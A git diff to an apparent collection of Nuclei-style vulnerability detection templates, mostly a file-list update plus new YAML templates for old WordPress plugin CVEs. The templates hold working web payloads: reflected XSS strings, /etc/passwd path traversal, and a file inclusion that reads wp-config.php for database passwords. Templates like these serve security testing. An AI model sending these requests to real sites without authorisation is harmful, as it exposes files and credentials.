diff --git a/date.txt b/date.txt index a611dd4894..f4039d392c 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241207 +20241208 diff --git a/poc.txt b/poc.txt index cb2e350082..5559c16fcc 100644 --- a/poc.txt +++ b/poc.txt @@ -9379,6 +9379,7 @@ ./poc/cve/CVE-2012-4033.yaml ./poc/cve/CVE-2012-4226-fa09b7f54fa1dd8f41345d33cd119a7e.yaml ./poc/cve/CVE-2012-4226.yaml +./poc/cve/CVE-2012-4242-2185.yaml ./poc/cve/CVE-2012-4242-2188.yaml ./poc/cve/CVE-2012-4242-ad8105428e239327d370c7e6d993aab5.yaml ./poc/cve/CVE-2012-4242.yaml @@ -9394,6 +9395,7 @@ ./poc/cve/CVE-2012-4272-be8ad5d2a33e00e145c6c6d44c6091d7.yaml ./poc/cve/CVE-2012-4272.yaml ./poc/cve/CVE-2012-4273-2194.yaml +./poc/cve/CVE-2012-4273-2195.yaml ./poc/cve/CVE-2012-4273-2198.yaml ./poc/cve/CVE-2012-4273-60f2c9c88ca63cf1daa993ad4a08d418.yaml ./poc/cve/CVE-2012-4273.yaml @@ -10380,6 +10382,7 @@ ./poc/cve/CVE-2014-4939-bf7b531fae1dcfdfe3627d9403f862bf.yaml ./poc/cve/CVE-2014-4939.yaml ./poc/cve/CVE-2014-4940-2382.yaml +./poc/cve/CVE-2014-4940-2384.yaml ./poc/cve/CVE-2014-4940-2385.yaml ./poc/cve/CVE-2014-4940-43748e45f4cf7db5084c38897ab37317.yaml ./poc/cve/CVE-2014-4940.yaml @@ -10814,6 +10817,7 @@ ./poc/cve/CVE-2015-1000010.yaml ./poc/cve/CVE-2015-1000011-6ef8738040302a74ae4f4262e6a4cba3.yaml ./poc/cve/CVE-2015-1000011.yaml +./poc/cve/CVE-2015-1000012-2457.yaml ./poc/cve/CVE-2015-1000012-2458.yaml ./poc/cve/CVE-2015-1000012-2460.yaml ./poc/cve/CVE-2015-1000012-2461.yaml @@ -11850,6 +11854,7 @@ ./poc/cve/CVE-2016-1000126-30945a13785775ff2a15985cf5c40b39.yaml ./poc/cve/CVE-2016-1000126.yaml ./poc/cve/CVE-2016-1000127-2644.yaml +./poc/cve/CVE-2016-1000127-2646.yaml ./poc/cve/CVE-2016-1000127-2647.yaml ./poc/cve/CVE-2016-1000127-5d15dee6dbe4e10317fdcb5b87ac684a.yaml ./poc/cve/CVE-2016-1000127.yaml @@ -11949,6 +11954,7 @@ ./poc/cve/CVE-2016-1000152.yaml ./poc/cve/CVE-2016-1000153-2733.yaml ./poc/cve/CVE-2016-1000153-2735.yaml +./poc/cve/CVE-2016-1000153-2736.yaml ./poc/cve/CVE-2016-1000153-de892b497579d25c72a68ec08f4653ec.yaml ./poc/cve/CVE-2016-1000153.yaml ./poc/cve/CVE-2016-1000154-2737.yaml @@ -14229,6 +14235,7 @@ ./poc/cve/CVE-2019-14205 (copy 2).yaml ./poc/cve/CVE-2019-14205 2.yaml ./poc/cve/CVE-2019-14205-098c82f7405a94e86794e799d21c1cc9.yaml +./poc/cve/CVE-2019-14205-3823.yaml ./poc/cve/CVE-2019-14205-3827.yaml ./poc/cve/CVE-2019-14205.yaml ./poc/cve/CVE-2019-14206-16b211e0a341fd7a3b47a5ac194b810e.yaml @@ -16534,6 +16541,7 @@ ./poc/cve/CVE-2021-24175.yaml ./poc/cve/CVE-2021-24176-5632.yaml ./poc/cve/CVE-2021-24176-5634.yaml +./poc/cve/CVE-2021-24176-5636.yaml ./poc/cve/CVE-2021-24176-5637.yaml ./poc/cve/CVE-2021-24176-897532800150bcb7077f612cb260b674.yaml ./poc/cve/CVE-2021-24176.yaml @@ -16918,6 +16926,7 @@ ./poc/cve/CVE-2021-24341.yaml ./poc/cve/CVE-2021-24342-074bf64cb028087442f7a1ccad7aa166.yaml ./poc/cve/CVE-2021-24342-5713.yaml +./poc/cve/CVE-2021-24342-5715.yaml ./poc/cve/CVE-2021-24342.yaml ./poc/cve/CVE-2021-24343-9f42b99bff397ce305a84405d05da54c.yaml ./poc/cve/CVE-2021-24343.yaml @@ -19896,6 +19905,7 @@ ./poc/cve/CVE-2022-0420.yaml ./poc/cve/CVE-2022-0421-c065c35c2799effc1f77319c878c3214.yaml ./poc/cve/CVE-2022-0421.yaml +./poc/cve/CVE-2022-0422(1).yaml ./poc/cve/CVE-2022-0422-af03e6837ec88ed4891cf93143a78408.yaml ./poc/cve/CVE-2022-0422.yaml ./poc/cve/CVE-2022-0423-e0cf21ac7a9cbe934922bbf95506b03b.yaml @@ -34511,6 +34521,7 @@ ./poc/cve/CVE-2024-10045-b4e327038c9d97f0951cbe31ae85ae95.yaml ./poc/cve/CVE-2024-10045.yaml ./poc/cve/CVE-2024-10046-58130bbbe77191649997e6898ed33238.yaml +./poc/cve/CVE-2024-10046.yaml ./poc/cve/CVE-2024-10048-b98a29a036ced771c9bb009b9895710a.yaml ./poc/cve/CVE-2024-10048.yaml ./poc/cve/CVE-2024-10049-5634711959b0699a5bdae8c67ef9be92.yaml @@ -35132,6 +35143,7 @@ ./poc/cve/CVE-2024-11009-550f0a103f6e5df20eeae8b67792bff7.yaml ./poc/cve/CVE-2024-11009.yaml ./poc/cve/CVE-2024-11010-7519a29fa5d8193b924c132cd64d9dbf.yaml +./poc/cve/CVE-2024-11010.yaml ./poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml ./poc/cve/CVE-2024-11024.yaml ./poc/cve/CVE-2024-11028-be11a59cf40f1f75ac81807f970e31ef.yaml @@ -35291,6 +35303,7 @@ ./poc/cve/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml ./poc/cve/CVE-2024-11326.yaml ./poc/cve/CVE-2024-11329-f4a6dd5bf508f9d3296e0c4d117e8f7b.yaml +./poc/cve/CVE-2024-11329.yaml ./poc/cve/CVE-2024-1133-5aaf4a16979d2f881469e06c92325e8d.yaml ./poc/cve/CVE-2024-1133.yaml ./poc/cve/CVE-2024-11330-fd1fc6fe3457cdd01c56d0c2ac10a22f.yaml @@ -35314,6 +35327,7 @@ ./poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml ./poc/cve/CVE-2024-11352.yaml ./poc/cve/CVE-2024-11353-46013ef48c10e8c9ce8df577a52a29bc.yaml +./poc/cve/CVE-2024-11353.yaml ./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml ./poc/cve/CVE-2024-11354.yaml ./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml @@ -35332,6 +35346,7 @@ ./poc/cve/CVE-2024-11366-cc7c5723ad039e93a1f894e0ec9c21a6.yaml ./poc/cve/CVE-2024-11366.yaml ./poc/cve/CVE-2024-11367-4392dd5590d051190c7b848c08c2e24d.yaml +./poc/cve/CVE-2024-11367.yaml ./poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml ./poc/cve/CVE-2024-11368.yaml ./poc/cve/CVE-2024-11370-8905f30acaa5202d5d378bf4d5583236.yaml @@ -35340,9 +35355,11 @@ ./poc/cve/CVE-2024-11371-95a048e99cf0968d3759cd47fec02e09.yaml ./poc/cve/CVE-2024-11371.yaml ./poc/cve/CVE-2024-11374-5e058c4cfdb79709cb4c1958dcfa10ca.yaml +./poc/cve/CVE-2024-11374.yaml ./poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml ./poc/cve/CVE-2024-11379.yaml ./poc/cve/CVE-2024-11380-827eb566b7e0140da5bc0bdff9496148.yaml +./poc/cve/CVE-2024-11380.yaml ./poc/cve/CVE-2024-11381-4ba6eeaab054e0e01702e7251bb00372.yaml ./poc/cve/CVE-2024-11381.yaml ./poc/cve/CVE-2024-11385-43829d07561569d5ecaceb7ea47ba97c.yaml @@ -35391,6 +35408,7 @@ ./poc/cve/CVE-2024-11435-295c6f456e7c23cf3678b8d2ff5718f3.yaml ./poc/cve/CVE-2024-11435.yaml ./poc/cve/CVE-2024-11436-f42166b559af8c596bb7bd6baf4bea0a.yaml +./poc/cve/CVE-2024-11436.yaml ./poc/cve/CVE-2024-11438-466e48b3dc4ddb929568c36634c56fb1.yaml ./poc/cve/CVE-2024-11438.yaml ./poc/cve/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml @@ -35404,6 +35422,7 @@ ./poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml ./poc/cve/CVE-2024-11450.yaml ./poc/cve/CVE-2024-11451-efa8bab249d4c41a9a195e0192e63d9d.yaml +./poc/cve/CVE-2024-11451.yaml ./poc/cve/CVE-2024-11453-fa7409a899cdcce4323f76f911032569.yaml ./poc/cve/CVE-2024-11453.yaml ./poc/cve/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml @@ -35412,6 +35431,7 @@ ./poc/cve/CVE-2024-11456-1c20e0d56bf66bc1f213217d116132ca.yaml ./poc/cve/CVE-2024-11456.yaml ./poc/cve/CVE-2024-11457-1fb447159a76a7d90af6bcf11c77f7bb.yaml +./poc/cve/CVE-2024-11457.yaml ./poc/cve/CVE-2024-11458-06c2883fbed5c08d970a9ed931a3e19e.yaml ./poc/cve/CVE-2024-11458.yaml ./poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml @@ -35421,9 +35441,11 @@ ./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml ./poc/cve/CVE-2024-11463.yaml ./poc/cve/CVE-2024-11464-e3ddfb3c3eeafb3077e966e3de489912.yaml +./poc/cve/CVE-2024-11464.yaml ./poc/cve/CVE-2024-11466-72daf3a307a80f4554dc36ae480bafa0.yaml ./poc/cve/CVE-2024-11466.yaml ./poc/cve/CVE-2024-11501-6648e003ce861122d6bdf36694ec0ac2.yaml +./poc/cve/CVE-2024-11501.yaml ./poc/cve/CVE-2024-1157-d2b245ef8566e249301cbac489385050.yaml ./poc/cve/CVE-2024-1157.yaml ./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml @@ -35533,6 +35555,7 @@ ./poc/cve/CVE-2024-11903-fe2ae85697a23f24ded288f0b3d83370.yaml ./poc/cve/CVE-2024-11903.yaml ./poc/cve/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml +./poc/cve/CVE-2024-11904.yaml ./poc/cve/CVE-2024-11918-095887b4ec8bd9bbd522023a03b46270.yaml ./poc/cve/CVE-2024-11918.yaml ./poc/cve/CVE-2024-11925-7672d2ec8fe92df70998a26a9cf9b901.yaml @@ -35540,11 +35563,13 @@ ./poc/cve/CVE-2024-11935-088fa6aefbb99715a7cda0aadf2f36df.yaml ./poc/cve/CVE-2024-11935.yaml ./poc/cve/CVE-2024-11943-9cc06cbd2cda10ebe942d226be8a34ce.yaml +./poc/cve/CVE-2024-11943.yaml ./poc/cve/CVE-2024-11952-16ad33d112d4e8604b5e9b540af90fd8.yaml ./poc/cve/CVE-2024-11952.yaml ./poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml ./poc/cve/CVE-2024-12003.yaml ./poc/cve/CVE-2024-12026-048d32aed4281761d7c921ef3e5b09bc.yaml +./poc/cve/CVE-2024-12026.yaml ./poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml ./poc/cve/CVE-2024-12027.yaml ./poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml @@ -35574,8 +35599,10 @@ ./poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml ./poc/cve/CVE-2024-12110.yaml ./poc/cve/CVE-2024-12115-3d071505c2ef1942d31e62067bb7b342.yaml +./poc/cve/CVE-2024-12115.yaml ./poc/cve/CVE-2024-1212.yaml ./poc/cve/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml +./poc/cve/CVE-2024-12128.yaml ./poc/cve/CVE-2024-1213-387a75cacd130bdeb2c4a34a4e878883.yaml ./poc/cve/CVE-2024-1213.yaml ./poc/cve/CVE-2024-1214-054ce8e16369a5701a550443d837348b.yaml @@ -35583,17 +35610,24 @@ ./poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml ./poc/cve/CVE-2024-12155.yaml ./poc/cve/CVE-2024-12165-eedc303e6795f6150a7b4fb4301920b9.yaml +./poc/cve/CVE-2024-12165.yaml ./poc/cve/CVE-2024-12166-6e2be28a8c3bf8f7705203d8c2885904.yaml +./poc/cve/CVE-2024-12166.yaml ./poc/cve/CVE-2024-12167-3243c43b67568fda5b299414a4b2b1aa.yaml +./poc/cve/CVE-2024-12167.yaml ./poc/cve/CVE-2024-1217-e1f7e39e09d8b79f70c462087458d021.yaml ./poc/cve/CVE-2024-1217.yaml ./poc/cve/CVE-2024-1218-b64b71b9fc6a036f1598c987aa88895e.yaml ./poc/cve/CVE-2024-1218.yaml ./poc/cve/CVE-2024-1219-bc57ce19d5d43bbc7836b1cbd8ef2eec.yaml ./poc/cve/CVE-2024-1219.yaml +./poc/cve/CVE-2024-12209-6ec7c164fe320907f155f71f239635b3.yaml ./poc/cve/CVE-2024-12253-c678eb115eb7d6bb53d9036495534285.yaml +./poc/cve/CVE-2024-12253.yaml ./poc/cve/CVE-2024-12257-7d0fe0e508be4c5905b56491ebe3c6ea.yaml +./poc/cve/CVE-2024-12257.yaml ./poc/cve/CVE-2024-12270-452333282a2aa14ca2b9778df2f2339d.yaml +./poc/cve/CVE-2024-12270.yaml ./poc/cve/CVE-2024-1229-c6d7bb9ffd8a626f74b1cf581ee631f7.yaml ./poc/cve/CVE-2024-1229.yaml ./poc/cve/CVE-2024-1230-c16c6920d1a9d323e3888c155daedfe0.yaml @@ -47526,6 +47560,7 @@ ./poc/cve/CVE-2024-7892-a0d1694b509e866d180f36d7f175fd8a.yaml ./poc/cve/CVE-2024-7892.yaml ./poc/cve/CVE-2024-7894-c990ef07d46ce485400718766ec348bc.yaml +./poc/cve/CVE-2024-7894.yaml ./poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml ./poc/cve/CVE-2024-7895.yaml ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml @@ -47877,6 +47912,7 @@ ./poc/cve/CVE-2024-8678-32701a61a4be69d268e5913bb7dadd3d.yaml ./poc/cve/CVE-2024-8678.yaml ./poc/cve/CVE-2024-8679-d012f7b0feca7488fa920d9da71457d9.yaml +./poc/cve/CVE-2024-8679.yaml ./poc/cve/CVE-2024-8680-66081216a3685413779cdd14f0f9fe12.yaml ./poc/cve/CVE-2024-8680.yaml ./poc/cve/CVE-2024-8681-8fc56993d1c07dd1495b80fa682fab16.yaml @@ -84373,6 +84409,7 @@ ./poc/other/beanstalk-service.yaml ./poc/other/beast2.yaml ./poc/other/beautiful-taxonomy-filters-1a256bdd1513f2507d8de67d68254885.yaml +./poc/other/beautiful-taxonomy-filters.yaml ./poc/other/beauty-af9641ba5dc553a449654ef14a59f791.yaml ./poc/other/beauty-premium-5daae5daa6880f8a3ebf5f7b2a3f1a04.yaml ./poc/other/beauty-premium.yaml @@ -86565,6 +86602,7 @@ ./poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml ./poc/other/cf7-message-filter.yaml ./poc/other/cf7-mollie-df7c6abf26bb0d9acd31d6d0e3d1fe21.yaml +./poc/other/cf7-mollie.yaml ./poc/other/cf7-multi-step-dc451ec0e984e189bd60b12f2825ad31.yaml ./poc/other/cf7-multi-step.yaml ./poc/other/cf7-repeatable-fields.yaml @@ -87086,6 +87124,7 @@ ./poc/other/clickfunnels.yaml ./poc/other/clickjacking.yaml ./poc/other/clicksend-lead-capture-form-2013d5c3654ad4436f800e5050425673.yaml +./poc/other/clicksend-lead-capture-form.yaml ./poc/other/clickshare_cs-100_huddle_firmware.yaml ./poc/other/clicky-357dda116c9349ad73f3f8c0c8e4a868.yaml ./poc/other/clicky-560dc6864f6fa8907eb756d22c0c6f85.yaml @@ -87516,6 +87555,7 @@ ./poc/other/combodo-itop-installer.yaml ./poc/other/comcast-business.yaml ./poc/other/comexe-ras.yaml +./poc/other/comfino-payment-gateway.yaml ./poc/other/comic-easel.yaml ./poc/other/comicbookmanagementsystemweeklypicks-0f5c8320e798e6cafa6769f8fac1dd17.yaml ./poc/other/comicbookmanagementsystemweeklypicks.yaml @@ -91046,6 +91086,7 @@ ./poc/other/editorialmag-3bb6d7f8c1ce41332e68bc8cb1fb99e2.yaml ./poc/other/editorialmag.yaml ./poc/other/edk.yaml +./poc/other/edoc-easy-tables.yaml ./poc/other/edoc-employee-application-b0fbb8f06b94fd224b3fa5e75ee98d67.yaml ./poc/other/edoc-employee-application.yaml ./poc/other/edoc.yaml @@ -94794,6 +94835,7 @@ ./poc/other/gixaw-chat-d377df2c73c02f3f079775b56eb84c7c.yaml ./poc/other/gixaw-chat.yaml ./poc/other/gkrellm.yaml +./poc/other/gl-ar300m_firmware.yaml ./poc/other/glass-b3268283daf190fd77277f208bd83ee4.yaml ./poc/other/glass-malware.yaml ./poc/other/glass.yaml @@ -98561,6 +98603,7 @@ ./poc/other/library-bookshelves-f6b62efe8fc1a945d136d2024b30793d.yaml ./poc/other/library-bookshelves.yaml ./poc/other/library-management-system-258e017dc592b5e0b4705087c287cd24.yaml +./poc/other/library-management-system.yaml ./poc/other/library-viewer-ad379bf851018a949a2e8d9f80ea5c4a.yaml ./poc/other/library-viewer-b763b4fac265b393ce11f0636da63c04.yaml ./poc/other/library-viewer.yaml @@ -100952,6 +100995,7 @@ ./poc/other/multi-feed-reader-8f17cacb6f8c5e60292b0dd3859393d3.yaml ./poc/other/multi-feed-reader.yaml ./poc/other/multi-gallery-0b7e3d5e1ae64cd7a19df12119f75219.yaml +./poc/other/multi-gallery.yaml ./poc/other/multi-meta-box-7c92850f76882fd2a11570606d0c8ea5.yaml ./poc/other/multi-meta-box-bf3cf205d3d4ce7c171081c9dfe27c52.yaml ./poc/other/multi-meta-box-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -109181,6 +109225,7 @@ ./poc/other/smoothscroller-b97a1843450f4f1dcaeec794659eed9c.yaml ./poc/other/smoothscroller.yaml ./poc/other/smoove-elementor-892da9cf627aa96f4c780b708515a074.yaml +./poc/other/smoove-elementor.yaml ./poc/other/smpl-shortcodes-e69c558e1ddd33a09346202334d228be.yaml ./poc/other/smpl-shortcodes.yaml ./poc/other/smugmug.yaml @@ -110441,6 +110486,7 @@ ./poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml ./poc/other/swift-performance-lite-ff16d085629ee3b61efab5d02050c62e.yaml ./poc/other/swift-performance-lite.yaml +./poc/other/swift_performance_lite.yaml ./poc/other/swifty-bar-55e944853212366688eada78aebb13f0.yaml ./poc/other/swifty-bar.yaml ./poc/other/swifty-page-manager-125ba6d5368bb43e9932c9d58fc08007.yaml @@ -116273,6 +116319,7 @@ ./poc/other/zoom-phish.yaml ./poc/other/zoomitir.yaml ./poc/other/zoommeeting.yaml +./poc/other/zooom.yaml ./poc/other/zope.yaml ./poc/other/zopim-live-chat-772dea4c5c0f7c77cb8ca4d08a21143a.yaml ./poc/other/zopim-live-chat.yaml @@ -130350,6 +130397,7 @@ ./poc/sql/wp-gpx-maps-0d9a1e75d08df9ec9ff58db5271ee389.yaml ./poc/sql/wp-graphql-60429422ecdbfe1e7baa2c63158e03f3.yaml ./poc/sql/wp-gratify-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml ./poc/sql/wp-hide-pages-ebeced906f02d5af5f39e7c598c4dbe3.yaml ./poc/sql/wp-hide-post-2ef388f09bdbf3112427840fe6ddb7e9.yaml ./poc/sql/wp-homepage-slideshow-3ac3074835719ac29fdb4081e5eb9638.yaml @@ -139293,6 +139341,7 @@ ./poc/wordpress/wp-haberadam-idor.yaml ./poc/wordpress/wp-header-images-778b726247bbcead8f63ba72f803b4d7.yaml ./poc/wordpress/wp-header-images.yaml +./poc/wordpress/wp-health-13e7f9c38c97fef1a7e5dbdde401c273.yaml ./poc/wordpress/wp-helper-lite-51ceed56d70da3ede0b63b57ea323f11.yaml ./poc/wordpress/wp-helper-lite-812f4d12e6825238d498f82eea80f495.yaml ./poc/wordpress/wp-helper-lite-87ee63b2a0716467279341dc65787764.yaml @@ -140037,6 +140086,7 @@ ./poc/wordpress/wp-migration-duplicator-cc58613e8ec313ae53842602ce5cc591.yaml ./poc/wordpress/wp-migration-duplicator.yaml ./poc/wordpress/wp-mini-program-7610a9dcc02af3778b2d529500591729.yaml +./poc/wordpress/wp-mini-program.yaml ./poc/wordpress/wp-miniaudioplayer-4b9a713e7c89801670825b87bc593b2d.yaml ./poc/wordpress/wp-miniaudioplayer-8d223cc46413d4a2325246f5d13091fe.yaml ./poc/wordpress/wp-miniaudioplayer-9439fc79c484607a830430ba4dc0941c.yaml diff --git a/poc/cve/CVE-2012-4242-2185.yaml b/poc/cve/CVE-2012-4242-2185.yaml new file mode 100644 index 0000000000..0c1f535b27 --- /dev/null +++ b/poc/cve/CVE-2012-4242-2185.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4242 + +info: + name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 + + description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." + +requests: + - method: GET + path: + - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2012-4273-2195.yaml b/poc/cve/CVE-2012-4273-2195.yaml new file mode 100644 index 0000000000..bacae8d717 --- /dev/null +++ b/poc/cve/CVE-2012-4273-2195.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4273 + +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-4940-2384.yaml b/poc/cve/CVE-2014-4940-2384.yaml new file mode 100644 index 0000000000..a2d4666d76 --- /dev/null +++ b/poc/cve/CVE-2014-4940-2384.yaml @@ -0,0 +1,25 @@ +id: CVE-2014-4940 + +info: + name: WordPress Plugin Tera Charts - Directory Traversal + author: daffainfo + severity: high + description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. + reference: https://www.cvedetails.com/cve/CVE-2014-4940 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2015-1000012-2457.yaml b/poc/cve/CVE-2015-1000012-2457.yaml new file mode 100644 index 0000000000..6376589aaf --- /dev/null +++ b/poc/cve/CVE-2015-1000012-2457.yaml @@ -0,0 +1,35 @@ +id: CVE-2015-1000012 +info: + name: WordPress MyPixs <=0.3 - Local File Inclusion + author: daffainfo + severity: high + description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. + reference: + - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + - http://www.vapidlabs.com/advisory.php?v=154 + - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 + - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + metadata: + google-query: inurl:"/wp-content/plugins/mypixs" + tags: cve,cve2015,wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/06 diff --git a/poc/cve/CVE-2016-1000127-2646.yaml b/poc/cve/CVE-2016-1000127-2646.yaml new file mode 100644 index 0000000000..51c400aa1e --- /dev/null +++ b/poc/cve/CVE-2016-1000127-2646.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000127 + +info: + name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin ajax-random-post v2.00 + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 + tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000127 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2016-1000153-2736.yaml b/poc/cve/CVE-2016-1000153-2736.yaml new file mode 100644 index 0000000000..3b55e0bdd3 --- /dev/null +++ b/poc/cve/CVE-2016-1000153-2736.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000153 + +info: + name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin tidio-gallery v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 + - https://wordpress.org/plugins/tidio-gallery + - http://www.securityfocus.com/bid/93543 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000153 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-14205-3823.yaml b/poc/cve/CVE-2019-14205-3823.yaml new file mode 100644 index 0000000000..8e31524064 --- /dev/null +++ b/poc/cve/CVE-2019-14205-3823.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-14205 +info: + name: WordPress Ext Adaptive Images LFI + author: pikpikcu + severity: high + tags: cve,cve2019,wordpress,wp-plugin,lfi + description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. + reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14205 + cwe-id: CWE-22 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2021-24176-5636.yaml b/poc/cve/CVE-2021-24176-5636.yaml new file mode 100644 index 0000000000..1d03f5739e --- /dev/null +++ b/poc/cve/CVE-2021-24176-5636.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-24176 + +info: + name: WordPress JH 404 Logger XSS + author: Ganofins + severity: medium + description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. + reference: + - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 + - https://wordpress.org/plugins/jh-404-logger/ + tags: cve,cve2021,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2021-24176 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "JH 404 Logger" + part: body + + - 